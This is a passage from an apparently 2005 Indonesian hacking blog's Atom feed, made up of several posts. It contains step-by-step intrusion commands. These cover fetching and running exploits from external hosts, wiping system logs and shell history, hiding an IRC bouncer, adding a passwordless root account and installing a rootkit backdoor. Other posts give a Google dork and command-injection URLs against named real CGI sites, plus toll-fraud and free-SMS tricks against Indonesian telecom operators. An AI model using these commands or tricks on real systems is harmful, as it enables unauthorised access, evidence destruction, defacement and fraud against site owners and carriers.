/&gt;http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|&lt;br /&gt;=================================================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933585063664850?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933585063664850/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933585063664850&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933585063664850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933585063664850'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-2-hacking.html' title='TRIK 2 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933577552806203</id><published>2005-02-25T19:47:00.000+07:00</published><updated>2005-02-25T19:49:35.533+07:00</updated><title type='text'>TRIK 1 HACKING</title><content type='html'>autor : kawan - kawanku&lt;br /&gt;&lt;br /&gt; : TRIK MEMBUAT PSYBNC :&lt;br /&gt;=================================================================================================&lt;br /&gt;unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;&lt;br /&gt;cd var/tmp/ ; mkdir .... ; cd .... ;&lt;br /&gt;wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; &lt;br /&gt;mv Pre-psyBNC.tgz .sh ;&lt;br /&gt;tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;&lt;br /&gt;wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "&lt;br /&gt;mv psybnc.pid .log ; &lt;br /&gt;mv ./psybncchk .sh ; &lt;br /&gt;mv ./log/psybnc.log .mud ; &lt;br /&gt;find |grep psybnc&lt;br /&gt;=================================================================================================&lt;br /&gt;: TRIK MENGHAPUS LOG :&lt;br /&gt;=================================================================================================&lt;br /&gt;echo &gt;/var/spool/mail/root&lt;br /&gt;echo &gt;/var/run/utmp&lt;br /&gt;echo &gt;/var/log/wtmp&lt;br /&gt;echo &gt;/var/log/lastlog&lt;br /&gt;echo &gt;/var/log/messages&lt;br /&gt;echo &gt;/var/log/secure&lt;br /&gt;echo &gt;/var/log/maillog&lt;br /&gt;echo &gt;/var/log/xferlog&lt;br /&gt;rm -f /.bash_history /root/.bash_history /var/tmp/messages&lt;br /&gt;ln -s /dev/null /.bash_history&lt;br /&gt;ln -s /dev/null /root/.bash_history&lt;br /&gt;touch /var/log/messages&lt;br /&gt;chmod 600 /var/log/messages&lt;br /&gt;=================================================================================================&lt;br /&gt;rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r&lt;br /&gt;=================================================================================================&lt;br /&gt;: LOCAL ROOT MANDRAKE :&lt;br /&gt;=================================================================================================&lt;br /&gt;unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;&lt;br /&gt;cd /tmp ; mkdir " " ; cd " "&lt;br /&gt;1. wget www.geocities.com/lifron/local.tar.gz&lt;br /&gt;2. tar -zxvf local.tar.gz&lt;br /&gt;3. cd local&lt;br /&gt;4. ./lconfex -p&lt;br /&gt;5. ./lconfex -f&lt;br /&gt;6. ./handy.sh 0xbffff625 0xbffff5f1 &lt;br /&gt;7. mkdir segfault.eng ; touch segfault.eng/segfault.eng&lt;br /&gt;8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 &lt;br /&gt;9. id&lt;br /&gt;10. root&lt;br /&gt;11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua&lt;br /&gt;12. echo "tondano::0:0::/.tondano:/bin/bash" &gt;&gt; /etc/passwd&lt;br /&gt;passwd -d kuntua &lt;br /&gt;Changing password for user kuntua&lt;br /&gt;Removing password for user kuntua&lt;br /&gt;passwd: Success&lt;br /&gt;13. Login ke shell terus bersihkan log dan pasang backdoor&lt;br /&gt;14. last |grep kuntua&lt;br /&gt;15. su tondano&lt;br /&gt;16. wget http//www.geocities.com/lifron/remove.c&lt;br /&gt;17. gcc -o r remove.c -DGENERIC&lt;br /&gt;18. ./remove /home/kuntus&lt;br /&gt;19. wget www.geocities.com/lifron/shv4.tar.gz&lt;br /&gt;20. tar -zxvf shv4.tar.gz&lt;br /&gt;21. cd shv4&lt;br /&gt;22. ./setup pass port, misal ./setup gohanz 7788&lt;br /&gt;23. /usr/sbin/userdel -r kuntua&lt;br /&gt;24. cd /var/tmp/" " &lt;== Bersihkan semua tools&lt;br /&gt;25. Test shell dengan port 7788, login as : root, password : gohanz&lt;br /&gt;=================================================================================================&lt;br /&gt;find index.html&lt;br /&gt;whereis index.html&lt;br /&gt;locate index.html&lt;br /&gt;default :&lt;br /&gt;cd /var/www/html&lt;br /&gt;echo "KuNTuA ToNDaNo Was Here" &gt; index.html&lt;br /&gt;=================================================================================================&lt;br /&gt;cd /home&lt;br /&gt;mkdir apache&lt;br /&gt;cd apache&lt;br /&gt;mkdir public_html&lt;br /&gt;chmod 705 public_html&lt;br /&gt;cd public_html&lt;br /&gt;mv index.html mnc.html&lt;br /&gt;echo "KuNTuA ToNDaNo Was Here" &gt; mnc.html&lt;br /&gt;untuk mentesnya :&lt;br /&gt;http://IP-yg-kamu-hack/~apache&lt;br /&gt;------------------------------------------------------------------------------------&lt;br /&gt;from : kawan - kawan ku&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933577552806203?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933577552806203/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933577552806203&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933577552806203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933577552806203'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-1-hacking.html' title='TRIK 1 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933556239871016</id><published>2005-02-25T19:42:00.000+07:00</published><updated>2005-02-25T19:46:02.440+07:00</updated><title type='text'>Hole pada CGI</title><content type='html'>semuanya bisanaya letak kelemahan suatu hole di .cgi&lt;br /&gt;banyak yang sering kita jumpai&lt;br /&gt;cobak kita langsung aja oke:&lt;br /&gt;&lt;br /&gt;1. Kalian bukkak google.com&lt;br /&gt;2. allinurl:cgi/*.txt&lt;br /&gt;3. oiiiiiii banyak ya hihihihihii&lt;br /&gt;4. Sekarang kau cobak cari yang belakangnya *.txt&lt;br /&gt;5. Contohnya : &lt;br /&gt;&lt;br /&gt;http://www.indiabook.com/cgi-bin/text/text.cgi?ads1.txt|id|&lt;br /&gt;http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|&lt;br /&gt;http://www.submitshop.com/cgi-bin/text/text.cgi?ads2.txt|id;uname;pwd|&lt;br /&gt;http://www.photoserviceltee.com/cgi-bin/includer/includer.cgi?preload_img.txt|id;uname;pwd|&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933556239871016?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933556239871016/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933556239871016&amp;isPopup=true' title='3 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933556239871016'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933556239871016'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/hole-pada-cgi.html' title='Hole pada CGI'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933431589478411</id><published>2005-02-25T19:24:00.000+07:00</published><updated>2005-02-25T19:41:31.520+07:00</updated><title type='text'>BUG 10 CODE SMS TELKOMSEL</title><content type='html'>AUTOR : YUDHAX&lt;br /&gt;&lt;br /&gt;PADA EDISI KEMARIN TELAH SAYA TERANGKAN DAN JABARKAN PEMAKAIAN PEMANFAATAN BUG SMS PADA SATELINDO GSM.&lt;br /&gt;PADA KESEMPATAN INI KITA AKAN RUBAH PERMAINAN KE LAWAN MAIN DARI SATELINDO ITU SENDIRI .... TELKOMSEL GSM&lt;br /&gt;&lt;br /&gt;SISTEM GSM yang menggunakan teknik switching dengan memanfaatkan system base station &lt;br /&gt;memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone &lt;br /&gt;ke handphone lain yang nota bene mengirimkan suatu data terenscript yang dapat diditeksi oleh pesawat/nomor &lt;br /&gt;tujuan. dalam hal ini hampir semua fasilitas yang dikembangkan GSM tidak memiliki perbedaan yang sangat rumit, &lt;br /&gt;bahkan malah bisa dibilang HAMPIR SAMA. cuma sekarang dari SATELINDO telah melakukan patching pada &lt;br /&gt;sistem transfer smsnya dengan trik "LAMA" (yang notabene masih juga bisa saya tembus dengan trik baru &lt;br /&gt;..maaf satelindo akan saya bahas besok-besok hari bug barunya...) saya ucapkan salut pada SATELINDO &lt;br /&gt;yang telah melakukan banyak perubahan sistem hantar smsnya dan menggunakan serial yang baru :-) .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bug sms gratis TELKOMSEL kali ini menggunakan trik yang menyerupai BUG SATELINDO yang lama&lt;br /&gt;yaitu 10 nomer code kartu nomor seri produk TELKOMSEL diantaranya ;&lt;br /&gt;seri 226****** yang mempunyai arti +6281226***** (nomor jakarta)&lt;br /&gt;kode kartu yang bug 260**** s/d 269****   dengan head 0812-&lt;br /&gt;yang berarti kita bisa ngirim sms gratis ke nomor SIMPATI dengan seri 081226*****  :-)&lt;br /&gt;note 1: kode * diatas merupakan sembarang nomor (atau semua nomor seri kartu simpati yang aktive)&lt;br /&gt;note 2: hanya dapat dilakukan dengan simcard telkomsel&lt;br /&gt;&lt;br /&gt;cara sebagai berikut:&lt;br /&gt;&lt;br /&gt;1. ketik SMS&lt;br /&gt;2. kirim kenomor yang dituju ( misal: +6281226378** ) &lt;br /&gt;(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** &lt;- diambil dari kode kartu dan &lt;br /&gt;nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269 &lt;br /&gt;3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)&lt;br /&gt;4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter &lt;br /&gt;bintang hanya untuk menutupi nomor asli yang dituju.&lt;br /&gt;4. dapat kita liat bahwa sms kita terkirim.&lt;br /&gt;5. finish&lt;br /&gt;&lt;br /&gt;Dari sana kita bisa lakukan dengan sepuas hati.&lt;br /&gt;&lt;br /&gt;Penulis Minta MAAF KEPADA:&lt;br /&gt;&lt;br /&gt;1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI TELKOMSEL DAN SEMUA OPERATOR GSM INDONESIA&lt;br /&gt;2. SEMUA PIHAK YANG TERASA TERUGIKAN&lt;br /&gt;3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.&lt;br /&gt;&lt;br /&gt;SALAM PENULIS&lt;br /&gt;&lt;br /&gt;---- YUDHAX --------&lt;br /&gt;&lt;br /&gt;MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT &lt;br /&gt;KITA.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933431589478411?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933431589478411/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933431589478411&amp;isPopup=true' title='8 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933431589478411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933431589478411'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/bug-10-code-sms-telkomsel.html' title='BUG 10 CODE SMS TELKOMSEL'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933423830189730</id><published>2005-02-25T19:23:00.000+07:00</published><updated>2005-02-25T19:40:58.280+07:00</updated><title type='text'>===== TRIK TELPON GRATIS =====</title><content type='html'>Sebelumnya maaf jika artikel ini merugikan banyak pihak.&lt;br /&gt;Begitu banyak trik untuk mendapatkan sebuah keCERDIKAN dalam berkomunikasi, &lt;br /&gt;apalagi atas nama komunikasi secara GRATIS. ya kan.... &lt;br /&gt;&lt;br /&gt;Dalam hal ini saya tidak akan banyak basa-basi lagi.&lt;br /&gt;&lt;br /&gt;I. Trik telphon gratis Lokal (dalam kota)&lt;br /&gt;&lt;br /&gt;Fasilitas dan cara yang digunakan:&lt;br /&gt;1. Telphone umum koin yang masih hidup&lt;br /&gt;2. Pencet angka 1551 &lt;--- catatan:  angka 1 terakhir di pencet lama &lt;br /&gt;           hingga ada nada "tut/nit/nada sela lainnya"&lt;br /&gt;3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor &lt;br /&gt;           telphone lokal)&lt;br /&gt;4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp &lt;br /&gt;           yang dituju, maka anda bisa bicara sepuas bibir anda.&lt;br /&gt;&lt;br /&gt;note: UNTUK NOMOR LOKAL YANG TIDAK BISA DIHUBUNGI BIASANYA DIKARENAKAN:&lt;br /&gt;1. TERLALU BANYAK NOMOR YANG KEMBAR&lt;br /&gt;2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll&lt;br /&gt;3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG&lt;br /&gt;4. TELKOM SEDANG KENA TROUBLE :))&lt;br /&gt;&lt;br /&gt;II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)&lt;br /&gt;&lt;br /&gt;Fasilitas dan cara yang digunakan:&lt;br /&gt;1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)&lt;br /&gt;2. Telphonelah seperti kita menelephone biasa ke NOMOR TUJUAN LUAR &lt;br /&gt;           KOTA (khusus luar kota) &lt;br /&gt;3. Bicaralah sepuas hati dan sebengkak bibir anda&lt;br /&gt;4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:&lt;br /&gt;&lt;br /&gt;TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS &lt;br /&gt;                  SEPERTI NOMOR YANG DITUJU PERTAMA&lt;br /&gt;  misal: tujuan 021888555000 -&gt; bila telah selesai ketikan &lt;br /&gt;                         021888555000 lagi &lt;br /&gt; JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL&lt;br /&gt;&lt;br /&gt;TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN &lt;br /&gt;                  AKHIR&lt;br /&gt;  misal: tujuan 021888555000 -&gt; bila telah selesai ketikan &lt;br /&gt;                         031545552222 (BEDA NOMOR TUJUAN)&lt;br /&gt; JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CATATAN:  HATI² DALAM MELAKUAKN AKSI INI KARENA SANGAT MERUGIKAN LAIN PIHAK.&lt;br /&gt;  JANGAN SEKALI² GUNAKAN WARTEL TIPE A UNTUK MELAKUKAN TRIK II TELEPON &lt;br /&gt;          GRATIS KE LUAR KOTA  KARENA AKAN KELIHATAN PADA KOMPUTER BILLING &lt;br /&gt;          OPERATOR D DAN PASTI ANDA DICURIGAI KARENA PULSA AKAN HILANG BEGITU&lt;br /&gt;          SAJA DARI LAYAR MONITOR OPERATOR WARTEL.&lt;br /&gt;  JANGAN SERING² MENGGGUNAKAN TRIK INI, KARENA AKAN MERUGIKAN "PIHAK LAIN" =))&lt;br /&gt;&lt;br /&gt;SEGINI DULU DEH TRIK INI .. KAPAN² KITA BUAT LAGI TRIK BARU YANG LEBIH  &lt;br /&gt;MENGHEBOHKAN :)) SALAM MANIS BUAT SEMUA KAWAN² DI DUNIA MAYA #aikmel #e-c-h-o #postgres &lt;br /&gt;#hackercrew (karena aku hanya bagian dari kalian)&lt;br /&gt;&lt;br /&gt; -=+&gt; YUDHAX was here &lt;+=-&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933423830189730?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933423830189730/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933423830189730&amp;isPopup=true' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933423830189730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933423830189730'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-telpon-gratis.html' title='===== TRIK TELPON GRATIS ====='/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933416006106691</id><published>2005-02-25T19:19:00.000+07:00</published><updated>2005-02-25T19:40:24.610+07:00</updated><title type='text'>== BUG SMS SATELINDO ==</title><content type='html'>Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan &lt;br /&gt;ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon &lt;br /&gt;yang sangat merobek kantong. GSM yang menggunakan teknik switching dengan &lt;br /&gt;memanfaatkan system base station memungkinkan kita bisa mengirim pesan &lt;br /&gt;alphanumeric singkat dari sebuah Handphone ke handphone lain.oke sampe &lt;br /&gt;disini preambule kita akhiri.&lt;br /&gt;&lt;br /&gt;Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, &lt;br /&gt;itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan&lt;br /&gt;sebuah promosi produk yang akhirnya menjadi komersil. Bug yang saya dapatkan pada &lt;br /&gt;akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. &lt;br /&gt;kenapa satelindo? nomor yang di keluarkan pihak SATELINDO yang baru dengan nomor &lt;br /&gt;eri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi &lt;br /&gt;kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, &lt;br /&gt;dll tetap bisa dilakukan secara gratis. &lt;br /&gt;&lt;br /&gt;cara sebagai berikut:&lt;br /&gt;1. ketik SMS&lt;br /&gt;2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang) &lt;br /&gt;   (yang saya dapatkan yaitu buug mentari versi 6163 &lt;- diambil dari kode kartu dan&lt;br /&gt;   nomor awal dari kartu mentari tersebut)&lt;br /&gt;3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)&lt;br /&gt;4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter&lt;br /&gt;   bintang hanya untuk menutupi nomor asli yang dituju.&lt;br /&gt;4. dapat kita liat bahwa sms kita terkirim.&lt;br /&gt;5. finish&lt;br /&gt;&lt;br /&gt;Dari sana kita bisa lakukan dengan sepuas hati.&lt;br /&gt;&lt;br /&gt;Penulis Minta MAAF KEPADA:&lt;br /&gt;1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI SATELINDO &lt;br /&gt;2. SEMUA PIHAK YANG TERILHAMI UNTUK MELAKUKAN PERCOBAAN INI&lt;br /&gt;3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.&lt;br /&gt;        &lt;br /&gt;                          SALAM PENULIS&lt;br /&gt;                        &lt;br /&gt;        ---- YUDHAX  --------&lt;br /&gt;&lt;br /&gt;MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT KITA.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933416006106691?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933416006106691/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933416006106691&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933416006106691'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933416006106691'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/bug-sms-satelindo.html' title='== BUG SMS SATELINDO =='/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
